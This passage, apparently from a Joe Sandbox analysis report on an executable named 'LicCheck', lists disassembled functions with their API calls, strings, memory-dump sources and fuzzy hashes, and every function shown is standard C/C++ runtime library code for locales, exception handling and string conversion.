                                                                                                      • Part of subcall function 007A41D0: std::invalid_argument::invalid_argument.LIBCONCRT ref: 007A41DC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegisterstd::invalid_argument::invalid_argument
                                                                                                    • String ID: ,}$,}$bad locale name
                                                                                                    • API String ID: 1592514138-93938261
                                                                                                    • Opcode ID: 847ff295aaabe899a11f48ef2df85631420ca0963af9f1516afacab05ad830f8
                                                                                                    • Instruction ID: 774eaae693ed5a4e7166f70d6f101b7897920d2c23eaff96ea30dda989d4067a
                                                                                                    • Opcode Fuzzy Hash: 847ff295aaabe899a11f48ef2df85631420ca0963af9f1516afacab05ad830f8
                                                                                                    • Instruction Fuzzy Hash: 0F618FB0D01248DFDF50DFA4E885B9EBBB4BF56310F144559E805A7382EB7DA904CBA1
                                                                                                    Function 007A6660 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 120COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 007A6697
                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 007A669F
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 007A6728
                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 007A6753
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 007A67A8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                    • String ID: 0'y$Sdz$csm
                                                                                                    • API String ID: 1170836740-3815073844
                                                                                                    • Opcode ID: 1a45fc3da973fcf78d64eaf1a0b6419cfa3aa7f9c839f258d63f4455d828b1c4
                                                                                                    • Instruction ID: dbc5791065d0773bec9a7b45b894a4cd0f9d59fdd57d0f0bdb5bd027840aa583
                                                                                                    • Opcode Fuzzy Hash: 1a45fc3da973fcf78d64eaf1a0b6419cfa3aa7f9c839f258d63f4455d828b1c4
                                                                                                    • Instruction Fuzzy Hash: B741C834A10218DFCF10DF68C885AAE7FB5EF86318F188259E9146B392D739D915CF91
                                                                                                    Function 007A8B0A Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 007A8C29
                                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 007A8D37
                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 007A8E89
                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 007A8EA4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                    • String ID: csm$csm$csm
                                                                                                    • API String ID: 2751267872-393685449
                                                                                                    • Opcode ID: 64935222e142d8cf657bd0ca579e77ce254e14bd2ccf8306ac70091b81bdd0d0
                                                                                                    • Instruction ID: b0e654fc0b58179b4a8361efad6076f4637f76413731a663d3e73b531e3cbf55
                                                                                                    • Opcode Fuzzy Hash: 64935222e142d8cf657bd0ca579e77ce254e14bd2ccf8306ac70091b81bdd0d0
                                                                                                    • Instruction Fuzzy Hash: 29B1B171900209DFCF59DFA4C8459AEB7B5FF9A310F14425AE8146B201DB39DE61CFA2
                                                                                                    Function 007935E0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 162COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00793663
                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 007936AF
                                                                                                    • __Getctype.LIBCPMT ref: 007936C8
                                                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 007936E4
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00793779
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                    • String ID: ,}$bad locale name
                                                                                                    • API String ID: 1840309910-3579276375
                                                                                                    • Opcode ID: efccccba34deb693340e873c3c813facc7393bb22412f7a6b7ae0455f1b247e9
                                                                                                    • Instruction ID: ea21b2a263198e83f621f0752eed49a0916fe9aad0cb50b4c3a8208bf9054cc4
                                                                                                    • Opcode Fuzzy Hash: efccccba34deb693340e873c3c813facc7393bb22412f7a6b7ae0455f1b247e9
                                                                                                    • Instruction Fuzzy Hash: 465185F1D01248EBDF10DFE4D885B9EBBB8AF55310F144129E815A7342E779EA08CB91
                                                                                                    Function 00798DD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00798E06
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00798E29
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00798E49
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00798EBB
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00798ED3
                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00798EF6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                    • String ID: ,}
                                                                                                    • API String ID: 2081738530-828428382
                                                                                                    • Opcode ID: 622ec8fde523870d65bab37592783cd43fefc74c67b75db3e61601b8dff0aa76
                                                                                                    • Instruction ID: 72856ef84aa2ea2b26206fd3e8958f31b51bb0877b9dfedca047e0915c57497e
                                                                                                    • Opcode Fuzzy Hash: 622ec8fde523870d65bab37592783cd43fefc74c67b75db3e61601b8dff0aa76
                                                                                                    • Instruction Fuzzy Hash: 6D41AB71900219CFCF50DF94E845BAEB7B0FB46720F18425AE905A7391EB79AE04CB91
                                                                                                    Function 0079D980 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 225COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0079D9FD
                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0079DA50
                                                                                                    • __Getcoll.LIBCPMT ref: 0079DA62
                                                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0079DA81
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0079DB16
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Locinfo::_Lockit$GetcollLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                    • String ID: bad locale name
                                                                                                    • API String ID: 1629477862-1405518554
                                                                                                    • Opcode ID: 32b2f5bc7f4454172df6b2f7d241ade7f000adbbff7a6595b41b108b6433734c
                                                                                                    • Instruction ID: 427b1b6df685ba1c880be5a243faa435c38c1244c4936d682b4d1306eab641c8
                                                                                                    • Opcode Fuzzy Hash: 32b2f5bc7f4454172df6b2f7d241ade7f000adbbff7a6595b41b108b6433734c
                                                                                                    • Instruction Fuzzy Hash: F36192B1D00208DBEF10DFA8D88979EBBF4EF45310F144629E815A7382E7BDA944CB95
                                                                                                    Function 0079D000 Relevance: 10.6, APIs: 7, Instructions: 128COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • std::locale::_Init.LIBCPMT ref: 0079D045
                                                                                                      • Part of subcall function 007A4400: __EH_prolog3.LIBCMT ref: 007A4407
                                                                                                      • Part of subcall function 007A4400: std::_Lockit::_Lockit.LIBCPMT ref: 007A4412
                                                                                                      • Part of subcall function 007A4400: std::locale::_Setgloballocale.LIBCPMT ref: 007A442D
                                                                                                      • Part of subcall function 007A4400: _Yarn.LIBCPMT ref: 007A4443
                                                                                                      • Part of subcall function 007A4400: std::_Lockit::~_Lockit.LIBCPMT ref: 007A4483
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0079D05C
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0079D07E
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0079D09E
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0079D0CC
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0079D143
                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0079D15D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$std::locale::_$Concurrency::cancel_current_taskFacet_H_prolog3InitRegisterSetgloballocaleYarn
                                                                                                    • String ID:
                                                                                                    • API String ID: 298508500-0
                                                                                                    • Opcode ID: b91e62965ea246586fef07c05c146e49a69a55979a4b5ca6c6a68b56b8e61582
                                                                                                    • Instruction ID: b2e37e6603a287c3f29e9d8b2067eff24ee9404ad21abb86735b0704fe94c93e
                                                                                                    • Opcode Fuzzy Hash: b91e62965ea246586fef07c05c146e49a69a55979a4b5ca6c6a68b56b8e61582
                                                                                                    • Instruction Fuzzy Hash: 5F41A1B1D01618DFCF11DFA8E885BAEBBB0FB48320F14415AE815A7341D779AE05CBA1
                                                                                                    Function 007B4E84 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,007B4F91,00792EE7,?,?,00000000,?,?,007B51BB,00000021,FlsSetValue,007C9450,007C9458,?), ref: 007B4F45
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                    • API String ID: 3664257935-537541572
                                                                                                    • Opcode ID: 24d2a16dfeac29ddc2c0f774209594cdbc818193f82a1f11beda5bca59697c87
                                                                                                    • Instruction ID: 2f1c7af50d7e1c33e847c8971e76181955f4bbccfa4efcd2cc69ee6fa8d293d0
                                                                                                    • Opcode Fuzzy Hash: 24d2a16dfeac29ddc2c0f774209594cdbc818193f82a1f11beda5bca59697c87
                                                                                                    • Instruction Fuzzy Hash: F721B472A02211AFCB219B25EC45FEA3769AF417A0F294554F915A7292DB3CFD00C6E4
                                                                                                    Function 007AFF73 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,61DA755C,00792904,?,00000000,007C36F0,000000FF,?,007AFF03,8B56C18B,?,007AFED7,00000016), ref: 007AFFA8
                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 007AFFBA
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,007C36F0,000000FF,?,007AFF03,8B56C18B,?,007AFED7,00000016), ref: 007AFFDC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                    • String ID: 0'y$CorExitProcess$mscoree.dll
                                                                                                    • API String ID: 4061214504-3345235888
                                                                                                    • Opcode ID: cae7c9d3dc43d93a14fd489bdef4d1079af0283cf2a1953c75744f5c54da4b48
                                                                                                    • Instruction ID: e7c2264d741892da0d5ab6e959c51c1715cf0155196c6caa3726d9cea91b5a51
                                                                                                    • Opcode Fuzzy Hash: cae7c9d3dc43d93a14fd489bdef4d1079af0283cf2a1953c75744f5c54da4b48
                                                                                                    • Instruction Fuzzy Hash: 4F01A771904A19EFCB018F54DC09FAF77B8FB45B14F04462EE811A2290DB7D9940CA94
                                                                                                    Function 007C2436 Relevance: 9.2, APIs: 6, Instructions: 248COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __freea$Info
                                                                                                    • String ID:
                                                                                                    • API String ID: 541289543-0
                                                                                                    • Opcode ID: f35bc931d222fd4a35d10908d7a5abab94f4adbc0267a40df57f7261a3515f45
                                                                                                    • Instruction ID: 5fa8cba737013c45c84042509a164f8d3d2f7cc5d196951f39108f7ff26bca91
                                                                                                    • Opcode Fuzzy Hash: f35bc931d222fd4a35d10908d7a5abab94f4adbc0267a40df57f7261a3515f45
                                                                                                    • Instruction Fuzzy Hash: F171E672900205ABDF20AEA49C56FAF77B9AF49310F24015DE914B7293EB3D9D42C7B4
                                                                                                    Function 007A4F07 Relevance: 9.2, APIs: 6, Instructions: 224COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCPInfo.KERNEL32(?,?), ref: 007A4F92
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 007A5020
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007A5092
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 007A50AC
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007A510F
                                                                                                    • CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 007A512C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$CompareInfoString
                                                                                                    • String ID:
                                                                                                    • API String ID: 2984826149-0
                                                                                                    • Opcode ID: d750ff82a0ca3f219a3d27cd3496bc198a1ae4f569fe43ae30785acb2d40a637
                                                                                                    • Instruction ID: a7b9ebd80a1366b3d5cabcc6f307ce434cf796e9e860382ea35cd1ad5d998f27
                                                                                                    • Opcode Fuzzy Hash: d750ff82a0ca3f219a3d27cd3496bc198a1ae4f569fe43ae30785acb2d40a637
                                                                                                    • Instruction Fuzzy Hash: 6E71A37290054A9FDF218F64DC45BEF7BB6EFC6314F180219E905A7250E77E8941CBA1
                                                                                                    Function 007A4D1D Relevance: 9.2, APIs: 6, Instructions: 175COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 007A4D66
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 007A4DD1
                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007A4DEE
                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 007A4E2D
                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007A4E8C
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 007A4EAF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiStringWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 2829165498-0
                                                                                                    • Opcode ID: 8fed144feea931e62c24ce6d114ae6229ae70558358ae449e1a05a01bd86de23
                                                                                                    • Instruction ID: 2a94ca627c568856c8d12e86adfc412c9d4e7f095437793594abc8fc02740a41
                                                                                                    • Opcode Fuzzy Hash: 8fed144feea931e62c24ce6d114ae6229ae70558358ae449e1a05a01bd86de23
                                                                                                    • Instruction Fuzzy Hash: 2251BF72600206AFEF209F60CC44FAB7BA9FFC2750F154628F915EA150D7BA9C51CBA0
                                                                                                    Function 00798760 Relevance: 9.2, APIs: 6, Instructions: 162COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00798796
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 007987B9
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 007987D9
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0079884B
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00798863
                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00798886
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                    • String ID:
                                                                                                    • API String ID: 2081738530-0
                                                                                                    • Opcode ID: 50bdf1b7caa59bc39e6e5a31d90b0e1199c1562f7712125e228ec18d93f85e13
                                                                                                    • Instruction ID: 903526814c99e1303af410cab9a91e63126600b0715c28b01c8e68a31ac13e43
                                                                                                    • Opcode Fuzzy Hash: 50bdf1b7caa59bc39e6e5a31d90b0e1199c1562f7712125e228ec18d93f85e13
                                                                                                    • Instruction Fuzzy Hash: E551B371A00209DFCF10DF98E845BAEBBB4FF49720F14426AE815A7391DB38AD04CB91
                                                                                                    Function 00797D90 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 403COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strcspn
                                                                                                    • String ID: [fy$}$}
                                                                                                    • API String ID: 3709121408-1950649321
                                                                                                    • Opcode ID: 5ed6e7aedd80f54db97cfbd6cf78b533e7e4206ea493426b07e107dfd2e4a5a4
                                                                                                    • Instruction ID: 7fa1f5c80facda3a97a761c55c6b877d648281a0c62e4ad8fc56d727aef3b932
                                                                                                    • Opcode Fuzzy Hash: 5ed6e7aedd80f54db97cfbd6cf78b533e7e4206ea493426b07e107dfd2e4a5a4
                                                                                                    • Instruction Fuzzy Hash: 5AE19075A00249DFDF08CFA8D884AAEBBB6FF49300F148159E815AB351D739ED45CBA1
                                                                                                    Function 0079D1C0 Relevance: 9.1, APIs: 6, Instructions: 116COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0079D1FB
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0079D220
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0079D240
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0079D271
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0079D2E6
                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0079D300
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                    • String ID:
                                                                                                    • API String ID: 2081738530-0
